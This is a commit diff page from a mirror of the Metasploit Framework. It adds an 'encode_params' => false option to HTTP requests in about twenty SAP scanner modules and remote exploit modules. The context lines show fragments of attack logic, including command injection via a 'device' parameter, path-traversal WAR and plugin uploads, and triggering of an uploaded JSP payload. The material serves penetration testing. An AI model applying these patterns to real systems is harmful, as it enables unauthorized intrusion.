infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5181, Revert unwanted URI encoding

bug/bundler_fix
Christian Mehlmauer 2015-04-18 11:55:19 +02:00
parent 2a327b7c91 4f903a604c
commit 3417c3f5ab
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
21 changed files with 25 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
View File

@ -81,6 +81,7 @@ class Metasploit4 < Msf::Auxiliary
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'sap-client' => datastore['CLIENT'], 'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN' 'sap-language' => 'EN'

1
modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
View File

@ -123,6 +123,7 @@ class Metasploit4 < Msf::Auxiliary
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'authorization' => basic_auth(username, password), 'authorization' => basic_auth(username, password),
'encode_params' => false,
'headers' => 'headers' =>
{ {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',

1
modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb
View File

@ -102,6 +102,7 @@ class Metasploit4 < Msf::Auxiliary
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'sap-client' => datastore['CLIENT'], 'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN' 'sap-language' => 'EN'

1
modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
View File

@ -103,6 +103,7 @@ class Metasploit4 < Msf::Auxiliary
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'sap-client' => datastore['CLIENT'], 'sap-client' => datastore['CLIENT'],
'sap-language' => 'EN' 'sap-language' => 'EN'

1
modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb
View File

@ -71,6 +71,7 @@ class Metasploit4 < Msf::Auxiliary
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'sap-client' => client, 'sap-client' => client,
'sap-language' => 'EN' 'sap-language' => 'EN'

1
modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb
View File

@ -89,6 +89,7 @@ class Metasploit4 < Msf::Auxiliary
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
}, },

1
modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
View File

@ -75,6 +75,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions'

1
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb
View File

@ -78,6 +78,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',

1
modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
View File

@ -78,6 +78,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{ 'headers' =>{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',

1
modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
View File

@ -94,6 +94,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' =>{ 'headers' =>{
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',

1
modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb
View File

@ -69,6 +69,7 @@ class Metasploit4 < Msf::Auxiliary
'data' => data, 'data' => data,
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'encode_params' => false,
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'headers' => { 'headers' => {
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',

1
modules/exploits/linux/http/openfiler_networkcard_exec.rb
View File

@ -105,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/admin/system.html', 'uri' => '/admin/system.html',
'cookie' => "usercookie=#{user}; passcookie=#{pass};", 'cookie' => "usercookie=#{user}; passcookie=#{pass};",
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'step' => '2', 'step' => '2',
'device' => "lo#{cmd}" 'device' => "lo#{cmd}"

1
modules/exploits/linux/http/sophos_wpa_iface_exec.rb
View File

@ -102,6 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
login = send_request_cgi({ login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php'), 'uri' => normalize_uri(target_uri.path, '/index.php'),
'method' => 'POST', 'method' => 'POST',
'encode_params' => false,
'vars_post' => post, 'vars_post' => post,
'vars_get' => { 'vars_get' => {
'c' => 'login', 'c' => 'login',

1
modules/exploits/linux/http/zen_load_balancer_exec.rb
View File

@ -97,6 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/index.cgi', 'uri' => '/index.cgi',
'authorization' => basic_auth(user, pass), 'authorization' => basic_auth(user, pass),
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'nlines' => lines, 'nlines' => lines,
'action' => 'See logs', 'action' => 'See logs',

3
modules/exploits/multi/http/hyperic_hq_script_console.rb
View File

@ -66,6 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(@uri.path, 'j_spring_security_check'), 'uri' => normalize_uri(@uri.path, 'j_spring_security_check'),
'method' => 'POST', 'method' => 'POST',
'cookie' => @cookie, 'cookie' => @cookie,
'encode_params' => false,
'vars_post' => { 'vars_post' => {
'j_username' => Rex::Text.uri_encode(user, 'hex-normal'), 'j_username' => Rex::Text.uri_encode(user, 'hex-normal'),
'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'), 'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'),
@ -86,6 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'), 'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'),
'cookie' => @cookie, 'cookie' => @cookie,
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'typeId' => '10003' 'typeId' => '10003'
} }
@ -144,6 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri(@uri.path, 'hqu/gconsole/console/execute.hqu?org.apache.catalina.filters.CSRF_NONCE=')+@nonce, 'uri' => normalize_uri(@uri.path, 'hqu/gconsole/console/execute.hqu?org.apache.catalina.filters.CSRF_NONCE=')+@nonce,
'cookie' => @cookie, 'cookie' => @cookie,
'encode_params' => false,
'vars_post' => { 'vars_post' => {
'code' => java # java_craft_runtime_exec(cmd) 'code' => java # java_craft_runtime_exec(cmd)
} }

2
modules/exploits/multi/http/openfire_auth_bypass.rb
View File

@ -184,6 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'),
'method' => 'POST', 'method' => 'POST',
'data' => data, 'data' => data,
'encode_params' => false,
'headers' => { 'headers' => {
'Content-Type' => 'multipart/form-data; boundary=' + boundary, 'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length, 'Content-Length' => data.length,
@ -202,6 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Deleting plugin #{plugin_name} from the server") print_status("Deleting plugin #{plugin_name} from the server")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'),
'encode_params' => false,
'headers' => { 'headers' => {
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
}, },

1
modules/exploits/windows/http/adobe_robohelper_authbypass.rb
View File

@ -71,6 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/robohelp/server', 'uri' => '/robohelp/server',
'version' => '1.1', 'version' => '1.1',
'method' => 'POST', 'method' => 'POST',
'encode_params' => false,
'data' => file, 'data' => file,
'headers' => { 'headers' => {
'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid,

1
modules/exploits/windows/http/desktopcentral_file_upload.rb
View File

@ -54,6 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
'method' => 'POST', 'method' => 'POST',
'data' => contents, 'data' => contents,
'ctype' => 'text/html', 'ctype' => 'text/html',
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'computerName' => 'DesktopCentral', 'computerName' => 'DesktopCentral',
'domainName' => 'webapps', 'domainName' => 'webapps',

1
modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb
View File

@ -85,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
send_request_cgi({ send_request_cgi({
'uri' => '/OvCgi/ovalarm.exe', 'uri' => '/OvCgi/ovalarm.exe',
'method' => "GET", 'method' => "GET",
'encode_params' => false,
'headers' => { 'headers' => {
'Accept-Language' => sploit 'Accept-Language' => sploit
}, },

1
modules/exploits/windows/http/sybase_easerver.rb
View File

@ -70,6 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'), 'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'),
'method' => 'GET', 'method' => 'GET',
'encode_params' => false,
'headers' => { 'headers' => {
'Accept' => '*/*', 'Accept' => '*/*',
}, },

3
modules/exploits/windows/http/zenworks_uploadservlet.rb
View File

@ -73,6 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
'headers' => { 'headers' => {
'Content-Type' => 'application/octet-stream', 'Content-Type' => 'application/octet-stream',
}, },
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'filename' => "../../webapps/#{app_base}.war" 'filename' => "../../webapps/#{app_base}.war"
} }
@ -82,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 20) select(nil, nil, nil, 20)
if (res.code == 200) if (res && res.code == 200)
print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...") print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...")
send_request_raw( send_request_raw(
{ {